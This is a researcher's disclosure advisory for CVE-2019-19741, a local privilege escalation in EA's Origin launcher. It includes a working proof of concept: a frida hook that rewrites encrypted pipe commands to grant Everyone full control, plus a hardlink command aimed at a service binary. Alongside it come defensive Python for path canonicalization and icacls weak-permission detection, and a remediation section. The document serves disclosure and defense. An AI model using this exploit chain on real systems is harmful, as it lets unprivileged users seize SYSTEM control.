EA Origin 10.5.55.33574 CreateDirectory arbitrary DACL write privilege escalation (CVE-2019-19741)

Tobias Györfi
5 min read · Feb 16, 2020


Summary

Electronic Arts’ game launcher Origin is vulnerable to local privilege escalation due to arbitrary file/directory DACL manipulation. The vulnerability was discovered by reverse engineering the named pipe protocol between the GUI application and the service running as SYSTEM. To trigger it, the pipe encryption had to be bypassed; to upgrade the resulting limited DACL write to an arbitrary DACL write, a blacklist filter had to be evaded, which is where the well-known “hardlink technique” was used.

Vendor: Electronic Arts
Product: Origin
Tested Version: 10.5.55.33574
Fixed Version: 10.5.56.33908 (with restricted access mode enabled)
CVSSv3: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)
CVSSv2: AV:L/AC:L/Au:S/C:C/I:C/A:C (6.8)
CVE Reference: CVE-2019-19741
CWE Reference: CWE-284: Improper Access Control

Introduction

The Origin game launcher consists of OriginClientService.exe, which runs as SYSTEM, and Origin.exe, which runs in the unprivileged user context. While the user process manages the user interface, the service performs the actions that require elevated privileges, such as registry modifications under HKEY_LOCAL_MACHINE, launching game installer applications and adjusting filesystem DACLs. To trigger these elevated actions, Origin.exe sends specific commands over the named pipe OriginClientService, which the service receives and processes.

Root Cause Analysis

The chain required to exploit this issue consists of three separate vulnerabilities and security architecture misconceptions.

Insufficient named pipe client verification (0x01)

When Origin.exe connects to the named pipe OriginClientService, the privileged service verifies the client’s executable file on disk instead of its in-memory process (which can differ significantly from the on-disk executable, e.g. due to DLL injection). This can be seen in the service logs (snippets):

ServiceQtThread 10372 EscalationServiceWin Starting…
Origin::Escalation::IPCServer::IPCServer 10372 LocalSocket listening on pipe: OriginClientService
Origin::Escalation::IEscalationService::IEscalationService 10372 Found escalation args.
Origin::Escalation::IEscalationService::IEscalationService 10372 Successfully determined caller process ID: 8252
Origin::Services::CryptoService::isValidEACertificate 10372 The file has a valid EA certificate: C:\Program Files (x86)\Origin\Origin.exe
Origin::Escalation::EscalationServiceWin::validateCaller 10372 Successfully validated caller PID: 8252 Path: C:\Program Files (x86)\Origin\Origin.exe

Internally, the executable file name is determined via GetModuleFileNameEx() and verified via WinVerifyTrust(). This is insufficient, since the running process can differ significantly from its on-disk executable and may be modified in memory, which is easily achieved by e.g. DLL injection (requiring no additional privileges).

Note: As GetModuleFileNameEx() reads the target process’ PEB->Ldr->InMemoryOrderModuleList, any process may connect successfully to the pipe by altering its own PEB.

Named pipe communication obfuscation bypass (0x02)

Data transmitted over the pipe OriginClientService is encrypted using a static key. Instead of hooking the pipe communication directly at WriteFileEx(), the encryption can be bypassed by hooking the EVP_EncryptUpdate() function of libeay32.dll, where the plaintext command is still available.

Incomplete mitigations in CreateDirectory component (0x03)

The pipe accepts the command CreateDirectory, which creates a directory and adjusts its DACL. Calls to this command can be intercepted, the directory and the DACL replaced, and the manipulated DACL is then written to the chosen file or directory. Some files and directories are blacklisted and must be avoided; alternatively, the blacklist filter might be evaded by using / instead of \.
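The separator trick works because a blacklist compared against the raw request string is not the same as a blacklist compared against the canonical path. The following is an added illustration written for this advisory, not Origin’s code (which is not public): a naive prefix filter next to one that canonicalizes Windows paths first. Only C:\Windows\system32 is taken from the advisory; the Program Files entry is an assumed example.

```python
import ntpath

# Directory prefixes the privileged operation must refuse. C:\Windows\system32
# is the entry named in the advisory; the Origin directory is an assumed addition
# for illustration (Origin's real filter list is not public).
BLACKLIST = [
    r"C:\Windows\system32",
    r"C:\Program Files (x86)\Origin",
]


def is_blocked_naive(path: str) -> bool:
    """Weak check: case-insensitive string prefix match on the raw request.

    A request written with forward slashes ("C:/Windows/system32/...") or with
    a ".." component never matches the backslash form in the list.
    """
    lowered = path.lower()
    return any(lowered.startswith(entry.lower()) for entry in BLACKLIST)


def canonicalize(path: str) -> str:
    """Collapse separators, '.' and '..' components and fold case, Windows-style.

    ntpath is used so the normalization behaves like Windows even when this
    script is run on another OS. It does NOT resolve hardlinks, junctions or
    8.3 short names, so it only closes the string-level bypass.
    """
    return ntpath.normcase(ntpath.normpath(path))


def is_blocked_hardened(path: str) -> bool:
    """Compare canonical request against canonical blacklist entries as whole
    path components, so "C:\\Windows\\system32evil" is not a false positive."""
    norm = canonicalize(path)
    for entry in BLACKLIST:
        canon_entry = canonicalize(entry)
        if norm == canon_entry or norm.startswith(canon_entry + ntpath.sep):
            return True
    return False


if __name__ == "__main__":
    for sample in ("C:/Windows/system32/evil.dll",
                   r"C:\Users\..\Windows\system32\evil.dll",
                   "C://Users/Tobias/test"):
        print(f"{sample!r}: naive={is_blocked_naive(sample)} "
              f"hardened={is_blocked_hardened(sample)}")
```

Even the hardened form remains a denylist on names, and the hardlink step described later in this advisory defeats it entirely because the name being checked is legitimately inside a user directory. Canonicalization is a necessary fix for the string bypass, but the durable fix is to stop performing the privileged operation on behalf of unprivileged callers, which is what Restricted Access Mode does.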

Proof-of-Concept

Exploiting the vulnerabilities is done by injecting frida-trace into the Origin.exe process (bypassing 0x01) and hooking OpenSSL’s EVP_EncryptUpdate() in order to modify the commands transmitted from Origin.exe to the service (bypassing 0x02). This is necessary because the pipe communication is encrypted.

Setting up frida-trace and adjusting the hook functionality in __handlers__\LIBEAY32.dll\:

onEnter: function (log, args, state) {
    // args[3] = input buffer (plaintext command), args[4] = input length
    log('EVP_EncryptUpdate() ' + args[4] + ' ' + Memory.readCString(args[3]));
    var orig = Memory.readCString(args[3]);
    if (orig.includes("CreateDirectory")) {
        // Swap the command for one carrying a chosen path and SDDL DACL string
        var buf = Memory.allocAnsiString("CreateDirectory\nC://Users/Tobias/test\nD:(A;OICI;GA;;;WD)\n\n");
        this.buf = buf; // keep a reference so the allocation is not garbage collected
        args[3] = buf;
        args[4] = ptr(58); // length of the replacement command in bytes
        log("Replaced with: " + Memory.readCString(args[3]));
    }
},

Start frida-trace using: frida-trace -I "ssleay32.dll" -i "EVP_EncryptUpdate" <pid>

The exploit is triggered by uninstalling and reinstalling a game in the Origin GUI (the reinstall fails). However, the destination file and directory names are filtered (e.g. C:\Windows\system32 is blacklisted).

Arbitrary DACL write is then achieved by creating a hardlink in a user-controlled directory that points to e.g. a service binary. The DACL is now written to this service binary, which results in privilege escalation. Note that the hardlink technique is not required for files and directories that are not affected by the blacklist, or if the blacklist can be bypassed successfully.

Creating a hardlink:

CreateHardlink.exe "C:\Users\Tobias\test" "C:\Program Files (x86)\Origin\OriginWebHelperService.exe"

Checking access control pre-exploitation:

C:\WINDOWS\system32>icacls.exe "C:\Program Files (x86)\Origin\OriginWebHelperService.exe"
C:\Program Files (x86)\Origin\OriginWebHelperService.exe NT-AUTORITÄT\SYSTEM:(I)(F)
                                                         VORDEFINIERT\Administratoren:(I)(F)
                                                         VORDEFINIERT\Benutzer:(I)(RX)
                                                         ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE ANWENDUNGSPAKETE:(I)(RX)
                                                         ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE EINGESCHRÄNKTEN ANWENDUNGSPAKETE:(I)(RX)

1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.

Access control after exploitation (Everyone has full access now):

C:\WINDOWS\system32>icacls.exe "C:\Program Files (x86)\Origin\OriginWebHelperService.exe"
C:\Program Files (x86)\Origin\OriginWebHelperService.exe Jeder:(F)

1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.
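The two icacls listings above are exactly what a defender should be looking for on a host that ran an affected Origin: a service binary whose DACL grants write-class rights to a low-privileged principal. The script below is an added example, not part of the advisory or of any EA tooling; it parses icacls output and flags such grants. The sample input is constructed from the advisory’s German-locale listings, and the set of “low-privileged” principal names is an assumed list covering the English and German forms.

```python
import re
from typing import List, Tuple

# icacls "simple rights" that allow modifying a file's content.
WRITE_SIMPLE = {"F", "M", "W"}
# icacls "specific rights" that allow changing content, owner or the DACL itself.
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "WDAC", "WO", "DE"}
# Inheritance flags that carry no permission on their own.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# Principals every interactive low-privileged user belongs to. Windows localizes
# these names, so English and German forms are listed (assumed list; extend it
# for other locales). Matched on the part after the last backslash.
LOW_PRIV_PRINCIPALS = {
    "everyone", "jeder",
    "users", "benutzer",
    "authenticated users", "authentifizierte benutzer",
    "interactive", "interaktiv",
    "all application packages", "alle anwendungspakete",
}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<grants>(?:\([^)]*\))+)\s*$")

SERVICE_BINARY = r"C:\Program Files (x86)\Origin\OriginWebHelperService.exe"

# Constructed from the advisory's icacls output, pre-exploitation.
ICACLS_BEFORE = r"""
C:\Program Files (x86)\Origin\OriginWebHelperService.exe NT-AUTORITÄT\SYSTEM:(I)(F)
                                                         VORDEFINIERT\Administratoren:(I)(F)
                                                         VORDEFINIERT\Benutzer:(I)(RX)
                                                         ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE ANWENDUNGSPAKETE:(I)(RX)
                                                         ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE EINGESCHRÄNKTEN ANWENDUNGSPAKETE:(I)(RX)

1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.
"""

# Constructed from the advisory's icacls output, post-exploitation.
ICACLS_AFTER = r"""
C:\Program Files (x86)\Origin\OriginWebHelperService.exe Jeder:(F)

1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.
"""


def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Parse `icacls <path>` output into (principal, [grant tokens]) pairs.

    icacls prints the path in front of the first ACE and indents the rest; the
    summary line at the end has no "principal:(...)" syntax and is skipped.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        grants = re.findall(r"\(([^)]*)\)", m.group("grants"))
        aces.append((m.group("principal"), grants))
    return aces


def grants_write(grants: List[str]) -> bool:
    """True if the ACE is an allow ACE whose rights permit modifying the object."""
    if "DENY" in grants:
        return False
    for token in grants:
        if token in INHERITANCE_FLAGS:
            continue
        rights = {r.strip() for r in token.split(",")}
        if rights & WRITE_SIMPLE or rights & WRITE_SPECIFIC:
            return True
    return False


def find_weak_grants(output: str, path: str) -> List[Tuple[str, str]]:
    """Return (principal, grants) for ACEs giving write-class rights to low-privileged groups."""
    weak = []
    for principal, grants in parse_icacls(output, path):
        short = principal.rsplit("\\", 1)[-1].strip().lower()
        if short in LOW_PRIV_PRINCIPALS and grants_write(grants):
            weak.append((principal, "".join(f"({g})" for g in grants)))
    return weak


if __name__ == "__main__":
    for label, listing in (("before", ICACLS_BEFORE), ("after", ICACLS_AFTER)):
        print(label, find_weak_grants(listing, SERVICE_BINARY))
```

On a real host, feed it the icacls output for each service image path (taken from the service configuration) rather than the embedded samples; an empty result for the pre-exploitation listing and a single Jeder:(F) hit for the post-exploitation one is the expected outcome for the two listings shown in this advisory.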

Note: While this technique requires the user to somehow cause Origin.exe to send a CreateDirectory command through the named pipe, an alternative approach would be to implement a specially crafted client application or to inject a DLL that triggers the vulnerability immediately after being loaded. In these cases, no user interaction is necessary for successful exploitation.

Remediation and vendor statement

Origin 10.5.56.33908 introduces the Restricted Access Mode, which completely disables the execution of privileged operations by unprivileged users and therefore remediates this vulnerability. This mode is disabled in default installations, meaning that both version 10.5.56.33908 (or greater) must be installed and Restricted Access Mode must be enabled separately to remediate this issue.

EA provides the following statement commenting on the vulnerability fix:

“Our goal with the publication of the advisory and corresponding blog post was to both address the underlying vulnerability and to provide transparency and insight into our approach in protecting Origin users. Ultimately we believe doing this enables Administrators to make an informed decision based on their risk profile. The vast majority of our current Origin users already have Administrator-level access and are the only user account on the machine (the number of users without Administrator-level access is less than 5% of our total Origin user base). This makes using the vulnerability unlikely across most users as it would not result in any further access or privileges.”

Disclosure timeline

2019-11-03: Issue discovered
2019-11-23: PoC development
2019-12-10: EA released v10.5.56.33908 and EASEC-2019-001 advisory addressing the architecture flaw affecting CVE-2019-19741, CVE-2019-19247 and CVE-2019-19248.
2019-12-12: CVE assignment
2019-12-16: Vendor contacted
2019-12-16: First response, vendor investigates issue
2019-12-19: Vendor confirms vulnerability
2019-12-27: Advisory draft
2020-02-16: Advisory disclosure (with vendor approval)

Note: The overall disclosure experience was professional and very pleasant.

References

Advisory EASEC-2019-001: https://www.ea.com/security/news/easec-2019-001-elevation-of-privilege-vulnerability-in-origin-client

EA Security Update: https://www.ea.com/security/news/origin-security-update-in-collaboration-with-external-security-researchers

Restricted Access Mode Help Article: https://help.ea.com/en/help/origin/origin/enable-restricted-access-mode-in-origin/

DACL writes to arbitrary files using hardlinks (by James Forshaw, Google Project Zero): https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

CreateHardlink.exe (by James Forshaw, Google Project Zero): https://github.com/googleprojectzero/symboliclink-testing-tools

CVE-2019-19248 (discovered by Matt Nelson and Vasily Kravetz): https://enigma0x3.net/2019/12/10/cve-2019-19248-local-privilege-escalation-in-eas-origin-client/

CVE-2019-19247 (discovered by Vasily Kravetz): https://amonitoring.ru/article/origin_lpe_disclosure/

Disclaimer

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.
